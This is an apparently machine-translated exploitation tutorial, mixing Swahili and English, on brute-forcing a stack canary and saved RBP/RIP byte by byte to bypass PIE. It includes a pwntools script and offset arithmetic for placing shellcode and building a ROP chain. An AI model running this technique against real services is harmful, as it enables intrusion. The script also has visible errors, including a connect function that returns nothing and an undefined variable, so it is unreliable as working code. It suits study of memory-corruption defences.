BF Addresses in the Stack

Ikiwa unakutana na binary iliyo na kinga ya canary na PIE (Position Independent Executable) huenda ukahitaji kupata njia ya kuipita.

Brute-Force Addresses

Ili kuipita PIE unahitaji kuvuja anwani fulani. Na ikiwa binary haivuji anwani zozote bora ni kujaribu RBP na RIP zilizohifadhiwa kwenye stack katika kazi iliyo hatarini. Kwa mfano, ikiwa binary inakingwa kwa kutumia canary na PIE, unaweza kuanza kujaribu canary, kisha bytes 8 zinazofuata (x64) zitakuwa RBP iliyohifadhiwa na bytes 8 zinazofuata zitakuwa RIP iliyohifadhiwa.

Ili kujaribu RBP na RIP kutoka kwa binary unaweza kugundua kwamba byte iliyokisiwa kuwa sahihi ni sahihi ikiwa programu inatoa kitu au haiporomoki. Kazi ile ile kama ilivyotolewa kwa kujaribu canary inaweza kutumika kujaribu RBP na RIP:

from pwn import *

def connect():
r = remote("localhost", 8788)

def get_bf(base):
canary = ""
guess = 0x0
base += canary

while len(canary) < 8:
while guess != 0xff:
r = connect()

r.recvuntil("Username: ")
r.send(base + chr(guess))

if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

# CANARY BF HERE
canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary

# PIE BF FROM HERE
print("Brute-Forcing RBP")
base_canary_rbp = get_bf(base_canary)
RBP = u64(base_canary_rbp[len(base_canary_rbp)-8:])
print("Brute-Forcing RIP")
base_canary_rbp_rip = get_bf(base_canary_rbp)
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])

The last thing you need to defeat the PIE is to calculate anwani muhimu kutoka kwa zilizovuja anwani: the RBP and the RIP.

From the RBP you can calculate wapi unandika shell yako kwenye stack. This can be very useful to know where are you going to write the string "/bin/sh\x00" inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a breakpoint after leaking the RBP an check wapi shellcode yako iko, then, you can calculate the distance between the shellcode and the RBP:

INI_SHELLCODE = RBP - 1152

From the RIP you can calculate the base address of the PIE binary which is what you are going to need to create a valid ROP chain. To calculate the base address just do objdump -d vunbinary and check the disassemble latest addresses:

Katika mfano huo unaweza kuona kwamba Byte 1 na nusu pekee inahitajika kutafuta msimbo wote, kisha, anwani ya msingi katika hali hii itakuwa RIP iliyovuja lakini ikimalizika kwenye "000". Kwa mfano, ikiwa umepata 0x562002970ecf anwani ya msingi ni 0x562002970000

elf.address = RIP - (RIP & 0xfff)

Improvements

Kulingana na uchambuzi fulani kutoka kwa chapisho hili, inawezekana kwamba wakati wa kuvuja thamani za RBP na RIP, seva haitakufa na baadhi ya thamani ambazo si sahihi na script ya BF itadhani ameweza kupata sahihi. Hii ni kwa sababu inawezekana kwamba anwani fulani hazitavunja hata kama hakuna zile sahihi kabisa.

Kulingana na chapisho hilo la blog, inapendekezwa kuongeza ucheleweshaji mfupi kati ya maombi kwa seva.